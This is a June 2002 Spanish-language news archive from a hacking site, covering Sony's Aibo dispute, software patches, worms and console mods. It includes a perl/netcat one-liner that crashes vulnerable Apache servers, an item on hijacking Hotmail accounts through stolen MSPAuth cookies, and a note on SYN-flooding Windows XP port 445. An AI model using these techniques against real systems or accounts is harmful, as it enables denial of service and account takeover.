Junio 2002

Sony Vs.Hackers
Noticia enviada el Viernes 28 de Junio de 2002 por Crakepeter

Sony solicita a un hacker (programador experto) que retire de Internet sus programas gratuitos para modificar los comportamientos y añadir nuevas funcionalidades al perro-robot Aibo. La decisión de Sony ha provocado una campaña protesta en la comunidad de seguidores de Aibo que están retirando sus páginas webs dedicadas a esta cibermascota, además de recomendar a los usuarios que dejen de comprarlo.

En una carta dirigida al hacker y firmada por Victor Matsuda, vicepresidente de Entertainment Robot America, división de Sony Electronics Inc., se solicita la retirada de contenidos del sitio web al entender que se está violando el copyright de los programas de Sony, se proporcionan mecanismos para burlar la protección del protocolo AIBO Memory Stick, y se distribuyen programas que parecen haber sido creados tras descompilar y descifrar software propietario de Sony.

El hacker de momento ha accedido a retirar sus programas mientras dura la controversia con Sony. En su defensa mantiene que en ningún momento su software proporciona modo alguno de eliminar las protecciones de Sony, simplemente ha creado herramientas que le permiten examinar y extender las funcionalidades de Aibo.

Todo parece indicar que el motivo de la disputa tiene que ver con R-Code, un formato de Sony utilizado para añadir nuevas funcionalidades a Aibo. Sony hasta la fecha comercializa paquetes que utilizan este formato vendiendo por un lado tarjetas de memoria (Memory Stick) que permiten a los robots "aprender" nuevos comportamientos prefabricados, y por otro lado a través de un software (Master Studio), al precio de 500 dólares, que permite diseñar comportamientos.

Por lo visto el hacker ha logrado hacerse con los entresijos de R-Code y el resto de protocolos que utiliza Aibo, asimismo ha practicado una "autopsia" a nivel de hardware con lo que propone algunas modificaciones físicas para mejorar las capacidades de Aibo, así como poderlo conectar al PC por el puerto serie o incluso sin necesidad de cables.

Los usuarios de Internet, además de ahorrarse los 500 dólares del software que vende Sony, podían eliminar algunas restricciones, aumentar las funcionalidades y bajarse paquetes de "comportamiento" gratuitos. Uno de los últimos, Disco Aibo, hacía bailar a la cibermascota al ritmo de la música.

De momento Sony no ha reaccionado ante las protestas que su decisión ha provocado. Tendrá que plantearse si, en términos económicos, merece la pena vetar la creación de código independiente para su producto y mantener el monopolio de la comercialización de su software o, como reclaman los usuarios, permitir la programación de terceros lo que, en teoría, podría disparar aun más las ventas de Aibo al aumentar las posibilidades de incluir nuevas funcionalidades y facilitar su personalización.

Importante actualización para Windows Media Player
Noticia enviada el Viernes 28 de Junio de 2002 por alex

La citada actualización elimina todos los problemas de seguridad de Windows Media Player conocidos hasta la fecha y tres nuevos que se especifican a continuación:

- Problema de divulgación de información, que posibilita a un agresor
ejecutar código en el sistema. Microsoft califica esta vulnerabilidad como "muy grave".

- Vulnerabilidad que permite acceder a Windows 2000 de forma física, iniciar una sesión en él y elevar los privilegios para lograr los mismos derechos que el sistema.

- Interpretación de scripts que posibilita la ejecución de cualquier código, debido a un problema existente en la lista de reproducción de Windows Media Player.


La actualización puede descargarse, según la versión de Windows Media
Player instalada, en las siguientes direcciones.

- Microsoft Windows Media Player 6.4

- Microsoft Windows Media Player 7.1

- Microsoft Windows Media Player para Windows XP

Fuente de la noticia Oxygen3 24h-365d, por Panda Software

Exploits
Noticia enviada el Jueves 27 de Junio de 2002 por alex

Lo prometido es deuda, así que estrenamos una nueva sección de Exploits.

A destacar el nuevo exploit que se aprovecha de la reciente vulnerabilidad del Apache "Chunked".

Visitar directorio de Exploits

3ª Edición Curso de Hacking Underlock
Noticia enviada el Jueves 27 de Junio de 2002 por alex

aNaloGik nos cuenta...

Queremos informaros de que mañana dia Jueves 27 de Junio a las 12 de la noche (Hora de la peninsula Española) Dará lugar la 3ª entrega del curso de hacking de Underlock en nuestra red de irc a la cual podeis conectar mediante Irc.Underlock.Com y en el canal #Underlock .

Esperamos contar con vuestra inestimable presencia en esta noche.

www.Underlock.Com

Caída de elhacker.net
Noticia enviada el Lunes 24 de Junio de 2002 por alex

elhacker.net ha estado off-line unas horas y la web ha estado inaccesible durante casi todo el dia.

La web ya vuelve a funcionar con absoluta normalidad.

Disculpad las molestias,
Alex

Virus en alerta.Al lorito...
Noticia enviada el Domingo 23 de Junio de 2002 por Crakepeter

Panda Software, informa sobre la aparición del gusano VBS/Chick.F (alias WorldCup). Esta nueva variante de Chick hace uso de la Ingeniería Social para engañar al usuario, ya que el contenido del mensaje de correo electrónico en el que llega incluido hace alusión al mundial de fútbol que, en estas fechas, está celebrándose en Corea y Japón.

WorldCup está diseñado para propagarse a través de correo electrónico y de la popular aplicación de Chat mIRC.

El mensaje en el que el gusano llega al equipo tiene por asunto: "RE:Korea Japan Results", mientras que en el cuerpo del mismo puede leerse: "Takes a look at these results... Regards". Por su parte, el fichero adjunto que, en realidad, contiene a WorldCup, lleva por nombre: Koreajapan.chm.

Si el usuario ejecuta el mencionado archivo, se muestra una ventana indicando que es necesaria la instalación de los controles ActiveX para poder ver el contenido del mismo. En caso de aceptar, WorldCup procederá a realizar sus acciones.

En primer lugar, el gusano se envía a la primera entrada de la libreta de direcciones. Sin embargo, esto lo hace una sola vez desde cada ordenador afectado, ya que, a tal efecto, genera una entrada en el registro de Windows.

Por otra parte, WorlCup busca el fichero MIRC.INI en el equipo. En caso de encontrarlo, crea en el sistema el fichero SCRIPT.INI. De esta manera, asegura su propagación a través de IRC. Además, el gusano se copia en el directorio de Windows en un archivo con el nombre Koreajapan.chm.

Finalmente, se muestra una pantalla que simula ser una aplicación mediante la cual el usuario podrá ver los resultados del mundial de fútbol.

Pese a que WorldCup no es un código malicioso especialmente peligroso, Panda Software aconseja no bajar la guardia y extremar las precauciones con cualquier mensaje de correo electrónico recibido.
Fuente.Pandasoftware

Nueva amenaza virica :W32/Gigirat
Noticia enviada el Sábado 22 de Junio de 2002 por Crakepeter

Win32.Girigat.4937 es el nombre con el que se conoce a la nueva amenaza vírica para las plataformas Windows de 32 bits (Win9x/WinNT/WinCE). El virus, distribuido recientemente por su propio autor, Mister Sandman, a diversas compañías antivirus, ha sido descubierto "in the wild" y reportado en, por orden de incidencias de menor a mayor, Indonesia, Japón, Dinamarca, Suiza, Estados Unidos, Italia y, por último, Grecia, donde diversos rumores apuntan a la posibilidad de que hubiese alcanzado los sistemas informáticos de ciertos cuerpos administrativos del gobierno heleno.
La vía de expansión de este virus ha sido con casi total probabilidad un gusano de mIRC encontrado recientemente en la conocida red Undernet, que se ha encargado de difundir cientos de copias del virus por los países anteriormente citados, según tenemos conocimiento hasta el momento. No se han encontrado por ahora ejemplares víricos ocultos en ninguno de los "newsgroups" de distribución habitual, lo que nos hace pensar en principio en una tercera vía de difusión aún desconocida. No obstante, el hecho de que el gusano que distribuye el virus por Internet no sea de la misma autoría que el virus, así como que hubiese sido el propio autor de Girigat quien hubiese enviado con cierta rapidez el virus a varias casas como AVP, DataFellows, NAi o Panda hace pensar en la posible existencia de una tercera persona, encargada de la distribución de Girigat, aparentemente sin la autorización de su autor.

La principal característica de Girigat es su capacidad de automutar su comportamiento, es decir, su forma de funcionar, cada vez que cambia de ordenador. El virus puede ser residente por proceso (por medio de API "hooking") o "runtime", o incluso ambos; asimismo, en caso de funcionar por medio de acción directa, es capaz de trabajar o bien en el directorio actual, o bien en el de Windows, o bien en ambos. Por último, Girigat es capaz de infectar CPL (paneles de control), EXE (ejecutables PE) y SCR (salvapantallas). El resultado de introducir todos estos elementos en una cocktelera y agitar, acción que se produce cada vez que el virus cambia de máquina, es uno de los 63 distintos virus que componen un solo virus, Girigat.

El virus además posee cuatro maneras distintas de activarse por medio de "payloads" gráficos, que son los que han delatado al virus y, por tanto, desencadenado la ola de infecciones reportadas. La activación del virus se produce al ejecutar una aplicación tres meses después de haber sido infectada, y existirá un 50% de probabilidades de que se active uno de los cuatro "payloads" de este virus.

La primera activación modifica el registro de configuraciones de Win32 con el fin de cambiar el escritorio y hacer que en éste se muestre el logotipo del virus. La segunda activación es un bucle mediante el cual el cursor del ratón se mueve de manera constante a posiciones aleatorias de la pantalla, haciendo imposible el uso de Windows. El tercer "payload" consiste en mostrar un cuadro de diálogo del tipo "Acerca de Windows", ligeramente modificado por los datos del virus y con las cadenas de copyright de su autor. Por último, el cuarto y último posible "payload" es un nuevo bucle infinito que emplea el virus para abrir y cerrar la bandeja del CD. Este efecto es capaz de causar deterioros en el "hardware", hasta el punto de tener que arreglar o sustituir la bandeja del CD en caso de que la ejecución del "payload" se prolongue durante horas, tal y como se ha reportado en contados -pero existentes- casos desde Estados Unidos e Italia.

Fuente:Nwesvirusworld

Un nuevo gusano en la red
Noticia enviada el Viernes 21 de Junio de 2002 por Crakepeter

En las últimas horas se está registrando una elevada actividad de escaneo del puerto 1433, habitualmente asociado a Microsoft SQL Server. El informe inicial publicado por incidents.org revela que se trata de un nuevo gusano.
El puerto 1433/tcp es utilizado en la configuración por defecto por Microsoft SQL Server. Cuando se instala este gestor de base de datos, se crea una cuenta por omisión (SA), con privilegios de administración y sin contraseña. Muchos administradores de SQL Server cometen el error de dejarla activa y no le asignan ninguna contraseña. Mediante la utilización de esta cuenta, se pueden ejecutar órdenes arbitrarias de SQL para, por ejemplo, leer o escribir bases de datos.

Este nuevo gusano descubierto, que actúa de forma automática, aprovecha estas cuentas de administración sin contraseña. Entre otras cosas, envía por correo electrónico una relación de las contraseñas del sistema a una dirección de correo electrónico (que, a primeras horas de esta tarde, devolvía un mensaje de error por sobrepasar la cuota máxima permitida).

Tal como recoge incidents.org, el gusano en estos momentos representa una importante actividad

Fuente:Hispasec

Más mods para Xbox
Noticia enviada el Jueves 20 de Junio de 2002 por CarLoS30

Un nuevo mod para Xbox, que permite que la consola ejecute juegos copiados ilegalmente y otras aplicaciones, se está vendiendo en ciertos sitios especializados en hacking. El producto, de nombre Enigmah-X, sigue requiriendo de ciertas modificaciones de la consola bastante complejas, por lo que no se espera una propagación demasiado rápido de estos mods.

Es que la instalación del Enigmah-X requiere de soldar cables en 29 puntos diferentes de la consola, aunque los desarrolladores del producto afirman que pronto tendrán una versión de 12 soldaduras. Por ahora, Microsoft no ha podido evitar la venta de estos mods, cuya distribución aún no ha sido detenida, aunque se espera algún tipo de demanda judicial para las próximas semanas.

Otros hackers, mientras tanto, se han concentrado en generar software que permite alterar la memoria flash de la consola, en donde reside el BIOS y aplicaciones críticas. Con esos cambios, la Xbox sería capaz de ejecutar programas bajo entornos como Linux, por ejemplo.

Fuente: Tectimes

El láser azul se viene con todo
Noticia enviada el Jueves 20 de Junio de 2002 por CarLoS30

La compañía Philips anunció que ya tiene listo un nuevo dispositivo de almacenamiento para teléfonos celulares, handhelds y reproductores de MP3, que usa la tecnología de laser azul, que hasta ahora no había tenido muchas aplicaciones comerciales. El producto es capaz de almacenar 1GB de datos en discos láser de apenas 3 cm de diámetro. El poco espacio que ocupa este dispositivo de almacenamiento (ver foto) permite así desarrollar un producto que puede ser llevado cómodamente de un lado al otro.

El dispositivo, que fue desarrollado por los laboratorios de investigación de Philips, saca ventaja de la tecnología “blue laser”, que aumenta la capacidad de almacenamiento de un CD y permite usar lentes más pequeñas, que además están fabricadas de plástico. Los espacios en donde se guardan los datos en el mini CD también son más pequeños que los de los actuales discos compactos.

El tamaño del producto, completo, es de apenas 5,6 cm de largo por 3,4 cm de ancho, con 0,75 cm de espesor. A pesar de estas reducidas dimensiones, puede guardar 1,5 veces el contenido de un CD normal. Si bien por ahora el producto es un prototipo que no tiene fecha confirmada de lanzamiento, los voceros de Philips afirmaron que la relación precio – megabyte será una de las más bajas del mercado.

El punto central de este abaratamiento en el costo de almacenamiento se basa en un punto clave: los discos compactos son una tecnología madura, con costos de fabricación bastante menores que los actuales estándares de almacenamiento para dispositivos móviles, como las Secure Card, Multimedia y CompactFlash. Además, estos mini CD de Philips podrían ser comercializados al igual que los discos compactos que conocemos: con contenido pregrabado, como música o software, o como CD en blanco para almacenar nuevos datos.

De todas maneras, no todas son ventajas en el caso de utilizar estos nuevos CDs. Por un lado, los discos deberían ser usados con un dispositivo aparte a la handheld o teléfono celular, lo que puede ser incómodo, cosa que no pasa con las tarjetas de almacenamiento. Y los discos, por su forma de funcionamiento, consumen más energía que las CompactFlash, por ejemplo, un ítem crucial en dispositivos portátiles, que sólo son recargados cada cierta cantidad de horas.

Fuente: Tectimes

¿ Apache es vulnerable ?
Noticia enviada el Jueves 20 de Junio de 2002 por alex

Para saber si el Apache 1.x es vulnerable:

perl -e 'print "POST <'(quitar esta coma simple)a href="http://www/index.html">http://www/index.html HTTP/1.1\r\nAccept: */*\r\nHost: www\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-length: 5000\r\n\r\n" . "A"x5000 . "\r\n\r\n"' | nc localhost 80

Luego hacer: 'cat /log/error_log'
Si es vulnerable verás algo así como:
[Wed Jun 19 21:29:24 2002] [notice] child pid 9792 exit signal Segmentation fault (11)

:P

Fuente de la noticia: qb0x.net

Microsoft rectifica el parche para la vulnerabilidad de MSN Chat
Noticia enviada el Jueves 20 de Junio de 2002 por CarLoS30

Se ha comprobado que el parche que ofrecía Microsoft para solucionar una vulnerabilidad en MSN Messenger, MSN Chat y Exchange Instant Messenger no actuaba correctamente.

MSN Chat Control, MSN Messenger en sus versiones 4.5 y 4.6, y Exchange Instant Messenger 4.5 y 4.6 están afectados por un problema de seguridad que podría permitir a un atacante ejecutar comandos en la máquina de la víctima. Para ello el atacante utiliza la posibilidad de causar un desbordamiento de búfer en "ResDLL", un parámetro del control ActiveX MSN Chat, con ello conseguiría la ejecución de código en la máquina afectada con los privilegios del usuario atacado.

La multinacional del software ha podido comprobar que el anterior parche ofrecido a sus usuarios no ofrecía los parámetros de seguridad deseados. Por ello, pone a disposición de sus usuarios un nuevo parche, que esta vez esperemos tenga el efecto deseado.

Igualmente están a disposición de los usuarios versiones corregidas para el software afectado:

MSN Chat control: http://chat.msn.com
MSN Messenger: http://messenger.msn.com/download/download.asp?client=1&update=1
Exchange Instant Messenger: http://www.microsoft.com/Exchange/downloads/2000/IMclient.asp
Parche disponible en la dirección: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=39632

Fuente: VnuNet www.vnunet.es

2 Entrega Curso de Hacking Underlock
Noticia enviada el Miércoles 19 de Junio de 2002 por alex

Os recordamos que el curso de hacking continua en nuestro servidor Irc.Underlock.Com al que podeis conectar escribiendo /Server Irc.Underlock.Com en vuestro cliente de IRC habitual.

El canal donde se imparten las clases es #Underlock y el dia es el jueves a las 12 de la noche (Hora de la peninsula española), el contenido de este curso será acabar lo que habiamos empezado de TCP/IP y una introduccion a la administracion de sistemas operativos UNIX.

www.Underlock.Com

Vulnerabilidad en Apache
Noticia enviada el Miércoles 19 de Junio de 2002 por alex

Todas las versiones del servidor web Apache se ven afectadas por
una vulnerabilidad en las funciones encargadas de procesar las
peticiones erróneas codificadas de forma troceada. Se trata de
una vulnerabilidad explotable de forma remota.

Las versiones de Apache hasta la 1.3.24 (incluida) y hasta la
2.0.36 (incluida) tienen un problema en las funciones que
procesan las peticiones erróneas recibidas que estén codificadas
de forma troceada ("chunked encoding").

Fuente de la noticia: Hispasec-una-al-día

Apache Security Advisory (June 17, 2002)

Lanzan el primer reproductor de Divx para Xbox : El producto requiere de modificaciones ilegales en la consola
Noticia enviada el Sábado 15 de Junio de 2002 por CarLoS30

Un grupo de hackers anunció la aparición de la primera versión de Xbox Media Player, una aplicación que permitiría reproducir películas Divx y VCD, formatos que muchas veces son usados para distribuir películas piratas. El reproductor requiere hacer modificaciones ilegales en la arquitectura de la Xbox, vía la inclusión de Mod Chips que deshabilitan ciertas funciones de protección de contenidos incluidas en la consola de Microsoft.

Por ahora, el Xbox Media Player no puede reproducir archivos MP3 y WMA, aunque esa funcionalidad está prevista para la próxima versión.

La venta de Mod Chips se está extendiendo rápidamente por la Red, y ya hay una oferta bastante variada, que permite incorporar diversas funciones a la consola. Y ya hay varios proyectos de crear emuladores de la Xbox para correr sus juegos en PC, y que operarían bajo el sistema operativo Linux.

Fuente: Tectimes

Un virus infecta archivos JPG pero por ahora presenta poco peligro
Noticia enviada el Sábado 15 de Junio de 2002 por CarLoS30

Un nuevo virus, conocido como W32/Perrun, es el primero que se conoce que logra infectar archivos JPEG. El código tiene dos partes: por un lado, un extractor de 5636 bytes, que permite desencriptar el virus, más un agregado de 11.780 bytes a cada imagen JPEG infectada. Debido a que el extractor debe estar presente en la PC del usuario para que el código malicioso se ejecute, la posibilidad de que el Perrun se desparrame rápidamente por la Red parece muy baja.

Además, el virus no cuenta con ninguna forma para distribuirse por la Red, por ejemplo autoenviándose a través de algún cliente de correo, por ejemplo.

Este código tiene todas las características de ser un “virus de concepto”, que busca probar que ciertos tipos de archivos y plataformas que parecían seguras en realidad no lo son tanto.


Fuente: Tectimes

Yahoo! le dice chau a las subastas en Europa
Noticia enviada el Sábado 15 de Junio de 2002 por CarLoS30

La compañía Yahoo! ha comenzado a hacer efectiva la decisión de cerrar sus sitios de subasta en Europa, y ha comunicado que a partir del 28 de junio no recibirá más ofertas para sus sitios en Gran Brataña, Francia, Alemania, Italia y España. La compañía, además, hizo un acuerdo con eBay, al que le cederá sus usuarios en el viejo continente.

Durante el año pasado, Yahoo! y eBay compitieron duramente por el mercado internacional de subastas, con resultados diversos. En Estados Unidos, por ejemplo, eBay ha ganado claramente la batalla, luego de Yahoo! introdujera el cobro de un abono, lo que le ocasionó la pérdida del 80% de su tráfico.

Pero en otros países el resultado fue distinto. Por ejemplo, en Japón, el éxito de la página de subastas de Yahoo! forzó a eBay a cerrar su sitio en ese país.

Fuente: Tectimes

iPod llega a Windows
Noticia enviada el Sábado 15 de Junio de 2002 por CarLoS30

La compañía Dataviz anunció el lanzamiento de una versión de MacOpener, que combina varias utilidades para usar aplicaciones de Mac en una PC, como el conocido MacDrive, que permite ver archivos de Mac OS en una PC que corra Windows. Entre las novedades, está la posibilidad de usar un reproductor iPod con el sistema operativo de Microsoft, y soporte para FireWire, además de distintos dispositivos de almacenamiento como discos Zip y Jaz.

La utilidad específica para el reproductor de MP3 de Apple se llama Ephpod, y que se integrará con el iPod de una manera similar al que lo hace con iTunes en la plataforma Mac OS.

La última versión de iPod apareció en el mercado en marzo de este año, y traía como principal novedad un disco de almacenamiento de 10GB. Algunos medios han especulado que en las próximas semanas Apple podría lanzar una versión de iTunes para Windows, pero por ahora la empresa no ha confirmado nada al respecto.

Fuente: Tectimes

¿ Cómo hackear una cuenta de hotmail ?
Noticia enviada el Viernes 14 de Junio de 2002 por CarLoS30

Las cuentas de correo Hotmail vuelven a ser el oscuro deseo de los hackers, que vuelven a demostrar la fragilidad y vulnerabilidad de la mismas. Un ataque simple y sencillo que puede ser realizado por cualquiera sin demasiados conocimientos de informática.
Lo único que hace falta para obtener acceso a una cuenta de Hotmail es capturar el archivo de cookies del navegador del usuario cuya cuenta queramos hackear.
En concreto las cookies de MSN.com, "MSPAuth" y "MSPProf" son las llaves digitales que le permiten a un presunto hacker acceder al correo de la víctima sin necesidad de contraseña.

No hace falta disponer de la contraseña, de hecho los cambios de contraseña por parte del usuario legal, no afectan a la vulnerabilidad, dado que una vez en poder de las cookies los hackers pueden volver a obtener la nueva. Una vez que disponemos de la cookies de alguien tenemos acceso eterno a la cuenta de la víctima. Además y dado los fallos de seguridad de Internet Explorer es bastante fácil emplear uno de ellos para robar cookies sin necesidad de tener acceso físico a la máquina de la víctima. El boquete de seguridad ha sido descubierto por Eric Glover, un programador de Nueva Jersey doctorado en ciencias de la computación en la Universidad de Michigan. El pasado viernes, empleados de Microsoft anunciaron que están trabajando frenéticamente para solucionar el problema de seguridad, y que esperan en breve tenerlo solucionado.

Fuente: Bajalo

Descubren un agujero de seguridad en el MSN Messenger
Noticia enviada el Viernes 14 de Junio de 2002 por CarLoS30

Permite a cualquier página observar cuales son nuestros contactos Un agujero de seguridad que permite que cualquier webmaster observe nuestros contactos en el MSN Messenger fue divulgado ayer en la lista especializada BugTraq. Al parecer, esta funcionalidad del mensajero está habilitada para que nuestra buddy list aparezca en los sitios de Microsoft como Hotmail, pero puede ser explotada por otras personas con ciertos conocimientos de Vbscript o JavaScript.

Una demostración de como funciona este agujero de seguridad se puede ver aquí Allí, en un cuadro de diálogo, podemos observar como se muestra nuestra lista completa de contactos y su respectivo e-mail. Un programa malicioso podría alterar la línea de código \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Messenger\Service\Policies\Suffixes y permitir el acceso a nuestro mensajero a otras personas, con sólo agregar un listado de sitios allí. Una de las formas de protegerse de este agujero de seguridad es desactivar las funcionalidades de ActiveX en el navegador de Microsoft. Al parecer, los usuarios de Opera y Netscape no sufren este problema, así como tampoco los de Trillian, incluso si usan el Internet Explorer.
Fuente: Tectimes

¿ Cómo colgar Windows XP desde Internet ?
Noticia enviada el Viernes 14 de Junio de 2002 por CarLoS30

Acaba de ser descubierta una grave vulnerabilidad en Windows XP, que permite a cualquiera colgar un ordenador con Windows XP que se encuentre conectado a Internet. El problema reside en un puerto TCP/IP que Windows XP deja abierto por defecto y que permite que cualquier usuario consuma la totalidad de recursos del equipo, ocasionando una denegación de servicio y dejando al sistema totalmente inoperativo.

El puerto al que nos referimos es el TCP 445, y es empleado por Windows XP para manejar recursos e impresoras compartidas a través de una red mediante el protocolo SMB (Server Message Block) a través de TCP/IP. Ello significa que es posible colgar en menos de 30 segundos cualquier sistema XP conectado a la red, simplemente enviando paquetes SYN Flag Set a dicho puerto. Dada la gravedad de la vulnerabilidad es más que aconsejable que todos los usuarios de Windows XP instalen un programa firewall y procedan a bloquear el puerto TCP 445.
Fuente: Hispamp3.com

Campaña "Real People" de Apple
Noticia enviada el Miércoles 12 de Junio de 2002 por CarLoS30

Con el objetivo de captar usuarios de PC y pasarlos al bando de la Mac, Apple va a lanzar una nueva campaña publicitaria titulada “Real People”, que consistirá en una serie de anuncios televisivos e impresos que van a tener como protagonistas a usuarios de PC convertidos a usuarios de Mac.

Según manifestó el presidente de Apple, Steve Jobs, esta campaña persigue demostrar a los consumidores que no sufrirán un aislamiento tecnológico si deciden adentrarse en el mundo Apple. Los testimonios personales recogidos en los anuncios son representativos de un total de 10.000 cartas y correos electrónicos enviados por usuarios de PC que migraron a Mac o que están considerando el cambio.

Actualmente Apple tiene una participación del 5% en el mercado de las computadoras y la compañía está plenamente conciente de que la única forma de crecer sustancialmente es atrayendo a usuarios de Windows. La campaña fue dirigida por el productor y director Errol Morris, autor de comerciales de televisión de marcas como Volkswagen y películas como "The thin blue line”.

Fuente: Datafull

Seguridad en impresoras
Noticia enviada el Miércoles 12 de Junio de 2002 por CarLoS30

El site Iblnews publicó un interesante artículo referente a las escasas medidas de seguridad que se adoptan en las impresoras. En la mayoría de los casos los usuarios se olvidan que cuando se conectan a una red pueden constituir una vía de acceso para intrusos.

Las noticias sobre ataques a través de impresoras no son nuevas ya que, de hecho, en 1999 se difundió información sobre un posible ataque procedente de Rusia a la red interna del Centro Espacial y Naval (Spa War) en San Diego (California). La intrusión quedó al descubierto cuando uno de los ingenieros de telecomunicaciones de la citada institución se dio cuenta de que una impresora conectada en red tardaba demasiado en empezar a imprimir un archivo. Tras analizar el problema se descubrió que el documento había sido "secuestrado", enviado a una dirección IP rusa y finalmente impreso. En definitiva, un intruso había hackeado la impresora y mediante ella había reconfigurado el enrutado de la información por un camino distinto al original.

A los recursos disponibles en Internet -que, de una forma u otra, muestran y enseñan cómo atacar una impresora-, se suman otras opciones como los estándares Tempest (que permiten capturar y reconstruir las radiaciones emitidas por los dispositivos electrónicos como los monitores, las impresoras o los microchips). Todo esto pone de manifiesto que las impresoras también deben ser tenidas en cuenta al establecer medidas de seguridad. Entre ellas destacan desactivar los servicios innecesarios, mantener el firmware actualizado y limitar el acceso a la contraseña que permite acceder a las impresoras.

Nuevo servicio de música online de Terra Lycos
Noticia enviada el Miércoles 12 de Junio de 2002 por CarLoS30

La compañía española Terra Lycos lanzó hoy un servicio de suscripción de música estilo radio, llamado Lycos Rhapsody, que ofrecerá temas de cuatro compañías discográficas importantes. Para este emprendimiento la empresa se asoció con Listen.com.

El servicio, que permitirá el acceso a más de 10.000 álbumes, no permite a los usuarios descargar la música o grabarla en CD, pero planea ofrecer esta posibilidad más adelante.
Listen.com suscribió acuerdos con BMG, unidad de Bertelsmann AG; Sony Music Entertainment, filial de Sony Corp. ; EMI Recorded Music, de EMI Group Plc y Warner Music Group, unidad de AOL Time Warner Inc. , así como muchos sellos independientes. El presidente ejecutivo de Listen.com, Sean Ryan, dijo que la compañía también estaba en conversaciones con Universal Music, filial de Vivendi Universal.
Cuando el servicio ofrezca la posibilidad de grabar discos compactos, Listen.com tendrá que renegociar las licencias con las firmas discográficas. Según informó la compañía, ya están desarrollando estas conversaciones.

Lycos Rhapsody es el último esfuerzo de Terra Lycos por cambiar el enfoque de la facturación publicitaria hacia los servicios pagados, tras sentir la baja de ingresos en el sector de la publicidad.

El acceso a este servicio será gratis hasta el 30 de junio. Después de esa fecha, los usuarios podrán escoger uno de los tres niveles de servicios. El nivel gratuito ofrecerá 20 estaciones de radios diferentes con calidad de sonido de Frecuencia Modulada (FM).
El segundo nivel, que los ejecutivos de las compañías equiparan a un servicio de cable "básico", permitirá a los usuarios el acceso a más de 50 estaciones de radio sin comerciales, con calidad de sonido de CD y la posibilidad de saltar pistas, a un costo de cinco dólares al mes.
El último nivel costará cerca de 10 dólares al mes, y permitirá el acceso ilimitado a través de más de 50 estaciones de radio sin comerciales, con calidad de sonido de CD, la capacidad de saltar pistas y la posibilidad de guardarlas en una especie de "temas favoritos".

Fuente : Datafull

Emprendimiento africano en la Red
Noticia enviada el Miércoles 12 de Junio de 2002 por CarLoS30

Titus Gitau y Stephen Njukia, dos jóvenes kenianos, decidieron implantar un mercado online de subastas de materias primas africanas para así permitir que los granjeros de su país puedan sacar un mejor beneficio de sus productos. Actualmente, a través del sistema tradicional, los productores africanos no reciben ni la décima parte de lo que se paga como precio final de sus productos en el mercado occidental.
Este nuevo sistema, que ya se aplica en Brasil desde 1999, supuso para las pequeñas cooperativas agrícolas mayores ingresos, al reducir el número de intermediarios, y les dio el beneficio de reducir el tiempo de espera hasta que el pago se hace efectivo. Como para tener una idea, en una primera prueba la cooperativa keniana Thiriku consiguió vender a una empresa japonesa 100 kilos de café por 453 dólares, mientras que en las subastas públicas del mercado tradicional de Nairobi el mismo producto se vendía por un máximo de 347 dólares. Además, el site consiguió que el pago se hiciera en un plazo de 24 horas, frente al plazo de 30 días que establece la legislación keniana.

La cooperativa Thiriku subasta en su site materias primas de los principales recursos naturales de la región, especialmente café, té, cacao, y algodón. Para ponerlo en marcha, desarrollaron una plataforma basada en Internet gracias a la cual exportadores africanos y productores de cualquier otro país pueden ofrecer sus materias primas al mundo. Este proyecto sorprende, sobre todo, porque la penetración de Internet en ese continente es muy poca: en el África subsahariana no supera el 5%, y en muchos países es tan baja que directamente ni se mide. En regiones donde apenas tienen qué llevarse a la boca, es un verdadero lujo poder afrontar el costo de una computadora, un teléfono y el servicio de conexión.

Fuente: Datafull

Nuevo virus: Shakira
Noticia enviada el Miércoles 12 de Junio de 2002 por CarLoS30

Symantec informó sobre la aparición del virus "VBS.VBSWG.AQ”, también conocido como VBS/VBSWG.aq@MM, VBS_VBSWG.AQ, VBS/VBSWG-AQ, VBSWG.AQ. El mismo se difunde a través del correo electrónico prometiendo mostrar fotos de Shakira. Según el centro de investigación Symantec Security Response, el incremento de máquinas infectadas llevó a pasarlo de una categoría 2 (amenaza, distribución y daño medio) a la categoría 3 (amenaza, daño y distribución alta).

El mail lleva como asunto “Fotos de Shakira”, el mensaje “Hola: Estoy enviando las fotos adjuntas, diviértete” y el archivo adjunto “ShakiraPics.jpg.vbs". Al ser ejecutado, el virus se copia en el directorio Windows y luego se autoenvía como ShakiraPics.jpg.vbs a todas las direcciones que aparecen en la lista de direcciones de Microsoft Outlook o IRP. Además, el gusano sobrescribe archivos .vbs y .vbe con su propio código.

Fuente : DataFull

Problemas eDonkey, Iexplorer y II Campaña de Seguridad en la Red
Noticia enviada el Lunes 10 de Junio de 2002 por alex

Empezamos con un desbordamiento de búfer en el eDonkey2000 que se soluciona con la nueva versión:
eDonkey2000 v35.16.61 Windows 9x/ME/XP/NT/2000

Para más info:
eDonkey 2000 ed2k: URL Buffer Overflow

Una problema más para el IExplorer, esta vez un problema de:

SOS Privacidad
Noticia enviada el Viernes 7 de Junio de 2002 por alex

STOP1984: Nota de Prensa, 7-Junio- 2002

El Parlamento Europeo decidió, en contra del principio fundamental de la directiva sobre protección de datos y las recomendaciones del Comité de Asuntos Legales y Derechos de los Ciudadanos, permitir la retención de datos.

De este modo, los estados miembros están legitimados para dictar leyes nacionales que obliguen a los proveedores a almacenar datos de las comunicaciones electrónicas, dejando de lado las normas existentes sobre protección de datos...

Prehackers se une al Chat
Noticia enviada el Jueves 6 de Junio de 2002 por alex

El canal de IRC está compartido entre infohackers.org, prehackers.com y elhacker.net, constituyendo un anillo en el que se comparte un mismo chat. De modo que en cada momento encontrarás usuarios de todas estas web. Se encuentra en en 213.96.205.184, puerto 6667.

Si no tienes un programa como mIRC para acceder a nuestro servidor, siempre puedes chatear desde el webchat.

Entrar al WebChat

¡Temalia muere!
Noticia enviada el Miércoles 5 de Junio de 2002 por CarLoS30

Estimado usuario de Temalia,
Desde hace un año y gracias sobre todo a tu colaboración, Temalia ha sido uno de los portales de más rápido crecimiento y un punto de referencia en el Internet de habla hispana.

Sin embargo, como bien sabes, el proceso de desarrollo y de madurez del mercado de Internet en España es lento, y nos impide, hoy por hoy, consolidar un proyecto de estas características.

Es por ello que la red de comunidades virtuales de Temalia va a cesar su actividad próximamente, hasta que mejoren las condiciones del mercado para su desarrollo.

Queremos aprovechar la ocasión para agradecer el interés que has mostrado por los contenidos y servicios que te hemos venido ofreciendo hasta hoy y que nos han permitido contar con 100 comunidades diferentes, 60.000 artículos y 300.000 usuarios.

Por todo ello, gracias.

El equipo de Temalia

Envía tus comentarios a info@temalia.com.

Fuente: Temalia.com

